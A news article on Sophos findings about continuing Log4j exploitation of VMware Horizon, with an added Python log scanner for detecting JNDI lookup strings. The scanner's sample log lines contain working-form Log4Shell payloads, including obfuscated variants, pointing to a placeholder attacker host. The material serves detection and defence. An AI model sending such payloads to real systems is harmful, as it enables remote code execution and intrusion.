Threat actors continue trying to compromise VMware Horizon systems through unpatched vulnerabilities in applications’ Log4j2 Java libraries, say researchers at Sophos.
In a report issued this week, the company says attempts to leverage Horizon and install cryptocurrency mining software or backdoors grew in January. And while the attempts have dropped off since then, they are continuing.
“The largest wave of Log4j attacks aimed at Horizon that we have detected began January 19, and is still ongoing,” the report says. Unlike other waves, this one doesn’t rely on an installed Cobalt Strike beacon calling back to the hackers. Instead, the cryptominer installer script is executed directly from the Apache Tomcat component of the Horizon server.
Discovered in December 2021, the vulnerability (CVE-2021-44228) enables a remote attacker to take control of a device on the internet through text messages if it runs certain versions of Log4j2. Apache had to issue four patches to address this and subsequently discovered holes.
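As an added illustration of how a defender can check for the ongoing activity the article describes (this is not code from Sophos or the article), the scanner below flags access-log lines carrying the Log4j JNDI lookup strings behind CVE-2021-44228, including URL-encoded and nested-lookup obfuscations. The log format and the IP addresses are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed Tomcat-style access-log lines (assumed format; not from the Sophos report).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [19/Jan/2022:03:14:07 +0000] "GET /portal/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [19/Jan/2022:03:14:09 +0000] "GET /broker/xml HTTP/1.1" 200 812 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [19/Jan/2022:03:14:11 +0000] "GET /broker/xml HTTP/1.1" 200 812 "-" "${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [19/Jan/2022:03:14:12 +0000] "GET /x?q=%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

# Innermost ${...} lookup: its body contains no nested braces or '$'.
_LOOKUP = re.compile(r'\$\{([^${}]*)\}')
# A JNDI lookup that survived normalisation; capture the scheme and the remote target.
_JNDI = re.compile(r'\$\{jndi:([a-z]+)://([^/}\s"]+)')

def _resolve(match):
    body = match.group(1)
    if body.lower().startswith(('lower:', 'upper:')):  # ${lower:x} / ${upper:x} -> x
        return body.split(':', 1)[1]
    if ':-' in body:                                    # ${env:NOPE:-x}, ${::-x} -> default x
        return body.rsplit(':-', 1)[1]
    return match.group(0)                               # unresolvable (e.g. jndi:...) -> keep as-is

def normalize(text):
    """Undo URL encoding and collapse nested lookups until nothing more resolves."""
    text = unquote(text)
    while True:
        collapsed = _LOOKUP.sub(_resolve, text)
        if collapsed == text:
            return text.lower()
        text = collapsed

def scan(lines):
    """Return one finding per log line that carries a JNDI lookup string."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hit = _JNDI.search(normalize(line))
        if hit:
            findings.append({'line': number, 'scheme': hit.group(1), 'target': hit.group(2)})
    return findings

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: jndi:{f['scheme']}:// -> {f['target']}")
```

A hit only shows that a lookup string reached the server; whether it succeeded depends on the Log4j2 version in use, so findings should be paired with the version and patch check the report recommends.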
“Organizations should thoroughly research their exposure to potential Log4j vulnerabilities, as they may impact commercial, open-source and custom software that in some cases may not have regular security support,” says the Sophos report. “But platforms such as Horizon are particularly attractive targets to all types of malicious actors because they are widespread and can (if still vulnerable) easily be found and exploited with well-tested tools.”
The report notes that VMware issued patches for Horizon on March 8. But, it adds, many organizations may still not have deployed the fixed versions or applied workarounds to vulnerable ones. “Even if they have,” the report says, “as demonstrated by the backdoors and reverse shell activity we found, those systems may already be compromised in other ways.”
Hackers still trying to compromise VMware Horizon through Log4j bug, says Sophos